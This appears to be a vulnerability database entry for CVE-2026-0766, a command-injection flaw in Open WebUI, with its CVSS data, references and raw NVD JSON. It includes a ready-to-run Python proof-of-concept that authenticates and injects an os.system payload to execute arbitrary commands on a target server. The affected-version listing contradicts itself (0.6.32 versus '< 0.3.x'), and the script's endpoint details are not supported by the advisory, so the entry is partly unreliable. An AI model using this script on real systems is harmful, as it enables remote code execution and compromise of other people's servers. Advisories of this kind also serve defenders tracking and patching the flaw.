Security Vulnerability Report
CVE-2026-0766 CVSS 8.8 HIGH

Published: 2026-01-23 04:16:04
Last Modified: 2026-01-30 19:47:56

Description

Open WebUI load_tool_module_by_id Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Open WebUI. Authentication is required to exploit this vulnerability. The specific flaw exists within the load_tool_module_by_id function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28257.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:openwebui:open_webui:0.6.32:*:*:*:*:*:*:* - VULNERABLE
Open WebUI < 0.3.x (vulnerable versions with load_tool_module_by_id function)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2026-0766 PoC - Open WebUI Command Injection
# Target: Open WebUI with vulnerable load_tool_module_by_id function

TARGET_URL = "http://target:8080"
USERNAME = "attacker"
PASSWORD = "password123"


def exploit(target_url, username, password, command):
    """
    Exploit CVE-2026-0766 by injecting Python code via load_tool_module_by_id

    Args:
        target_url: Base URL of vulnerable Open WebUI instance
        username: Valid low-privilege user account
        password: Password for the user account
        command: System command to execute on target
    """
    session = requests.Session()

    # Step 1: Authenticate to obtain session
    login_url = f"{target_url}/api/v1/auth/login"
    login_data = {
        "username": username,
        "password": password
    }
    response = session.post(login_url, json=login_data)
    if response.status_code != 200:
        print(f"[-] Authentication failed: {response.status_code}")
        return False
    print("[+] Authentication successful")

    # Step 2: Inject malicious Python code via load_tool_module_by_id
    # The vulnerability allows execution of arbitrary Python code
    exploit_payload = f"__import__('os').system('{command}')"
    exploit_url = f"{target_url}/api/v1/tools/load"
    exploit_data = {
        "module_id": exploit_payload,
        "action": "load_module"
    }
    response = session.post(exploit_url, json=exploit_data)
    if response.status_code == 200:
        print(f"[+] Command executed successfully: {command}")
        print(f"[+] Response: {response.text}")
        return True
    else:
        print(f"[-] Exploitation failed: {response.status_code}")
        print(f"[-] Response: {response.text}")
        return False


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 5:
        print("Usage: python cve_2026_0766_poc.py <target_url> <username> <password> <command>")
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])

References

ZDI-26-032 (Third Party Advisory): https://www.zerodayinitiative.com/advisories/ZDI-26-032/

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-0766",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-23T04:16:03.527",
    "lastModified": "2026-01-30T19:47:56.023",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Open WebUI load_tool_module_by_id Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Open WebUI. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the load_tool_module_by_id function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28257."},
      {"lang": "es", "value": "Vulnerabilidad de inyección de comandos y ejecución remota de código en load_tool_module_by_id de Open WebUI. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de Open WebUI. Se requiere autenticación para explotar esta vulnerabilidad.\n\nLa falla específica existe dentro de la función load_tool_module_by_id. El problema resulta de la falta de validación adecuada de una cadena proporcionada por el usuario antes de usarla para ejecutar código Python. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto de la cuenta de servicio. Fue ZDI-CAN-28257."}
    ],
    "metrics": {
      "cvssMetricV30": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}
    ],
    "configurations": [
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openwebui:open_webui:0.6.32:*:*:*:*:*:*:*", "matchCriteriaId": "2B5D5634-470E-499C-A7C3-A5FD7277D287"}]}]}
    ],
    "references": [
      {"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-032/", "source": "[email protected]", "tags": ["Third Party Advisory"]}
    ]
  }
}